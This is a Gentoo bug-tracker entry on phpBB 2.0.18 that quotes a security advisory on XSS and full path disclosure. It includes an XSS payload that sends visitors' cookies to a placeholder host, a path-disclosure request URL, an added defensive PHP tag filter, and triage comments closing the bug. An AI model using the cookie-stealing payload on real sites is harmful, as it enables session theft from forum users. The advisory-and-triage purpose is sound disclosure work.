
Bug 115908

Summary: www-apps/phpBB Possible several issues
Product: Gentoo Security
Reporter: Sune Kloppenborg Jeppesen (RETIRED) <jaervosz>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED WONTFIX
Severity: trivial
CC: grimmlin, web-apps
Priority: High
Version: unspecified
Hardware: All
OS: Linux
URL: http://archives.neohapsis.com/archives/fulldisclosure/2005-12/0829.html
Whiteboard: ~4 [?]
Package list:
Runtime testing required: ---

Description Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-12-17 23:11:44 UTC
Filing this for the forum devs.

[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM

--- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source
bulletin board package. phpBB has a user-friendly interface, simple and
straightforward administration panel, and helpful FAQ. Based on the powerful
PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or
Access/ODBC database servers, phpBB is the ideal free community solution for
all web sites.
Contact with author http://www.phpbb.com/about.php.

--- 1. XSS ---
If in phpBB "Allowed HTML tags" is "ON" (like b, i, u, pre) and you have
"Always allow HTML: YES" in your profile, or you are a Guest,

then you can use these tags:

<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>

Exploit:

<B C=">"
onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)"
X="<B "> H A L O </B>

and you have the cookies.

--- 2. Full Path Disclosure ---
In the file admin/admin_disallow.php there is:

-25-31---
if( !empty($setmodules) )
{
        $filename = basename(__FILE__);
        $module['Users']['Disallow'] = append_sid($filename);

        return;
}
-25-31---

The function append_sid() doesn't exist. And if you have:

register_globals = On
display_errors = On

Try to go to:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

-RESULT ERROR---
Fatal error: Call to undefined function: append_sid()
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
-RESULT ERROR---
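
One way to handle an allow-list of HTML tags so that the markup from section 1 stays inert, as an added example that is not from the advisory or from phpBB's own code: escape everything first, then restore only exact, attribute-free tags. The function name render_allowed_html and the default tag list are assumptions made for this sketch.

```php
<?php
// Added example, not phpBB code. render_allowed_html() is a hypothetical helper.

/**
 * Escape all markup, then re-enable only bare <b>, <i>, <u>, <pre> tags.
 * A tag that carries any attribute never matches the restore pattern,
 * so it remains escaped text instead of becoming live markup.
 */
function render_allowed_html(string $input, array $allowed = ['b', 'i', 'u', 'pre']): string
{
    // 1. Neutralise every <, >, & and quote so nothing is parsed as markup.
    $escaped = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

    // 2. Restore only "&lt;tag&gt;" and "&lt;/tag&gt;" with no attributes at all.
    $names = implode('|', array_map(function ($t) {
        return preg_quote($t, '#');
    }, $allowed));

    return preg_replace_callback(
        '#&lt;(/?)(' . $names . ')&gt;#i',
        function ($m) {
            return '<' . $m[1] . strtolower($m[2]) . '>';
        },
        $escaped
    );
}

// Sample input: the first proof of concept from section 1, plus a benign
// post constructed for comparison.
$samples = [
    '<B C=">" onmouseover="alert(\'SecurityReason.Com\')" X="<B "> H E L O </B>',
    'plain <b>bold</b> and <i>italic</i> text',
];

foreach ($samples as $s) {
    $out = render_allowed_html($s);
    // A live event handler needs an unescaped "<" ahead of the on*= attribute.
    $live = preg_match('#<[^>]*\bon\w+\s*=#i', $out) === 1;
    echo ($live ? 'UNSAFE ' : 'inert  '), $out, PHP_EOL;
}
```

The restore step does not balance tags, so an unmatched closing tag can survive; a production filter would also track open and close pairs.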
Comment 1 Tom Knight (RETIRED) gentoo-dev 2005-12-18 02:20:21 UTC
Our forums aren't affected by this as we have both HTML and register_globals switched off.
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2005-12-18 03:06:05 UTC
This looks very limited.
- XSS if Allowed HTML tags is set to "ON"
- Path disclosure if PHP has register_globals = On and display_errors = On

Those are non-standard settings... Closing this one, feel free to reopen if phpBB releases a new version.
Comment 3 Jakub Moc (RETIRED) gentoo-dev 2006-01-03 02:12:28 UTC
*** Bug 117560 has been marked as a duplicate of this bug. ***
Comment 4 Jakub Moc (RETIRED) gentoo-dev 2006-01-03 02:13:15 UTC
2.0.19 is out, if you want to revisit this.
Comment 5 Thierry Carrez (RETIRED) gentoo-dev 2006-01-03 02:29:30 UTC
Well, phpBB is still security-masked as a semi-permanent security PITA so no, I don't want to revisit this. However www-apps can still bump it to 2.0.19 if they want to, since lots of users security_unmask the thing and accept the risk.
Comment 6 Renat Lumpau (RETIRED) gentoo-dev 2006-01-03 03:12:14 UTC
2.0.19 in CVS, just FYI